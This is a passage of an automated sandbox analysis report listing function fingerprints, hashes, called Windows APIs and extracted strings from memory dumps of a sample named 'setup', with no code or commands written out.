                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID: @0$EGL: Failed to bind OpenGL: %s$ERROR: UNKNOWN EGL ERROR
                                                                                                    • API String ID: 1294909896-704385317
                                                                                                    • Opcode ID: e3b1eafed7c7ade2f5efbf26b03e93be669113c41e2397721520ae8b88a5b98a
                                                                                                    • Instruction ID: f318ec5b700054cf40ea953226ffbfdac3765ed9ad946570f5c30538e1dd7be0
                                                                                                    • Opcode Fuzzy Hash: e3b1eafed7c7ade2f5efbf26b03e93be669113c41e2397721520ae8b88a5b98a
                                                                                                    • Instruction Fuzzy Hash: E381E0B4918305DFD310EF28D58812ABBF4FB89305F40882DE99887351E775E998CF86
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DisplayEnumSettings$calloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1478160765-0
                                                                                                    • Opcode ID: e245a2d291e65c4c5358778b32a194b4750a0cecc24ffec4948669c2da434cd7
                                                                                                    • Instruction ID: 082297914236d7143529d211148730086a593e9b615a3701e0fa6b25ba2cd6e4
                                                                                                    • Opcode Fuzzy Hash: e245a2d291e65c4c5358778b32a194b4750a0cecc24ffec4948669c2da434cd7
                                                                                                    • Instruction Fuzzy Hash: CF71AFB45083458FD724DF68C584A5ABBF0FF88314F11892EE88897311E3B5E999CF82
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: BlackHole$basic_string::_M_construct null not valid$ddA$ddA
                                                                                                    • API String ID: 0-586649475
                                                                                                    • Opcode ID: 40565694111e16278f31a6c960f86d63ee1d380ff7cff7c0dd3bba72c4c09378
                                                                                                    • Instruction ID: 7fb323bc92d53da9bf78ac3baa6b524aac2af821814a88264b0170b63024d88f
                                                                                                    • Opcode Fuzzy Hash: 40565694111e16278f31a6c960f86d63ee1d380ff7cff7c0dd3bba72c4c09378
                                                                                                    • Instruction Fuzzy Hash: E5518AB0915218CBDB05EF68D581B9DBBF4BF55300F04446DEC88AF34ADB349948CBA2
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: calloc$strncpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3831826497-3916222277
                                                                                                    • Opcode ID: a5a7a48f2f01bebb11bc21fd48b6f3c7a2b9f66713a43ae8baeeb06833e1af57
                                                                                                    • Instruction ID: cdc4d0fa8d5389ef68c7648cec49c6435f80bb2d477cd825354cfb513d445abd
                                                                                                    • Opcode Fuzzy Hash: a5a7a48f2f01bebb11bc21fd48b6f3c7a2b9f66713a43ae8baeeb06833e1af57
                                                                                                    • Instruction Fuzzy Hash: 56415A38325241CBEB18CF59E8C4B6777E4AB44704F14843EAA0DCF282D6B4D8A4DF92
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: }($basic_string::_M_construct null not valid$N2$N2d6;
                                                                                                    • API String ID: 0-3348822851
                                                                                                    • Opcode ID: c9ce8801f16a50a29a02223b04c6b9df49c689ad5f924194ce09fc2e59a4afc8
                                                                                                    • Instruction ID: 07e1d2327693a23e3fb19710dedbc0498e5c6422466a1152c8c8b0d5a6ea3999
                                                                                                    • Opcode Fuzzy Hash: c9ce8801f16a50a29a02223b04c6b9df49c689ad5f924194ce09fc2e59a4afc8
                                                                                                    • Instruction Fuzzy Hash: 7C5148B48053219BCB02BF70D58279EBBF0BF50704F02886EEA995F306DB749944CB92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: atoi
                                                                                                    • String ID: progress$read$write
                                                                                                    • API String ID: 657269090-2066358310
                                                                                                    • Opcode ID: ed4c41bc92bc079e53386402286304dbc7fd8dd45d97196cad563e119d6f573b
                                                                                                    • Instruction ID: d709afa87d7b87f783c86ffda602dea7fc8509133b6571a0aefb86ddf3ab1810
                                                                                                    • Opcode Fuzzy Hash: ed4c41bc92bc079e53386402286304dbc7fd8dd45d97196cad563e119d6f573b
                                                                                                    • Instruction Fuzzy Hash: C0319E75A08708CFCB29CF29C49473ABBE0FB89325F15856EEA458B352D731D840CB51
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00214619
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 002146E8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                    • String ID: Ha!$R[!
                                                                                                    • API String ID: 3168844106-2161076317
                                                                                                    • Opcode ID: 37c95e2f220714ca54c3e8f44f01dd3975e28160667e59148d3eb174a23a4dd1
                                                                                                    • Instruction ID: ef2042408174c98440bc815f9bb7a09b8188df1a82b89ff27feb4206afcec2a8
                                                                                                    • Opcode Fuzzy Hash: 37c95e2f220714ca54c3e8f44f01dd3975e28160667e59148d3eb174a23a4dd1
                                                                                                    • Instruction Fuzzy Hash: 5B310775610B419FD720EF76D844BA3B7EABF9630AF10482DE59A86620C771B860CB21
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$calloc
                                                                                                    • String ID: read
                                                                                                    • API String ID: 3095843317-2555855207
                                                                                                    • Opcode ID: 528e04277cf530b18a12cf3af0724950ac0570cd5f3cfabed4147c6748146dd8
                                                                                                    • Instruction ID: 98036247d3d5a2e84d1b44bda5e7c148a72735786d45cddbd20d359a744fcfb3
                                                                                                    • Opcode Fuzzy Hash: 528e04277cf530b18a12cf3af0724950ac0570cd5f3cfabed4147c6748146dd8
                                                                                                    • Instruction Fuzzy Hash: CA2119B1A183028FD714DF79C58122EFBE1AFC8704F148A6EE498D7282D770D9548F46
                                                                                                    APIs
                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00275502), ref: 00274777
                                                                                                    • ReleaseSemaphore.KERNEL32 ref: 002747CE
                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00275502), ref: 002747DE
                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00275502), ref: 002747FB
                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00275502), ref: 00274824
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Leave$EnterReleaseSemaphore
                                                                                                    • String ID:
                                                                                                    • API String ID: 2813224205-0
                                                                                                    • Opcode ID: 8850c3842cf0e9de4c552d343202eaf54c599255da7d35cbb564fee0da2542e2
                                                                                                    • Instruction ID: 4bff65d531390b8ecc1bcdd7bee7c6f3594de1640fb636c1d561c05099058763
                                                                                                    • Opcode Fuzzy Hash: 8850c3842cf0e9de4c552d343202eaf54c599255da7d35cbb564fee0da2542e2
                                                                                                    • Instruction Fuzzy Hash: AF214FB26093018FD704AF39E98961AFBE4FB8A212F05453EE949C3351D671D9588B92
                                                                                                    APIs
                                                                                                    • GetMonitorInfoW.USER32 ref: 0024E333
                                                                                                    • SetWindowPos.USER32 ref: 0024E375
                                                                                                    • SetThreadExecutionState.KERNEL32 ref: 0024E4A7
                                                                                                      • Part of subcall function 00247570: VerSetConditionMask.KERNEL32 ref: 002475D9
                                                                                                      • Part of subcall function 00247570: VerSetConditionMask.KERNEL32 ref: 002475F5
                                                                                                      • Part of subcall function 00247570: VerSetConditionMask.KERNEL32 ref: 00247611
                                                                                                    • SystemParametersInfoW.USER32 ref: 0024E4F9
                                                                                                    • SystemParametersInfoW.USER32 ref: 0024E51D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConditionInfoMask$ParametersSystem$ExecutionMonitorStateThreadWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 346400206-0
                                                                                                    • Opcode ID: 437fd5c219e297005686341c609553758e0120938a067895a5c409ee12c65cf7
                                                                                                    • Instruction ID: a68f719928f388a1f122e78c4c68410b50d5c7d5aa6e97cc3ca10ee2011471b3
                                                                                                    • Opcode Fuzzy Hash: 437fd5c219e297005686341c609553758e0120938a067895a5c409ee12c65cf7
                                                                                                    • Instruction Fuzzy Hash: AF31ADB55197019FD704EF68D68831ABBE0BF88311F01896EE8998B355D7B5D888CF82
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
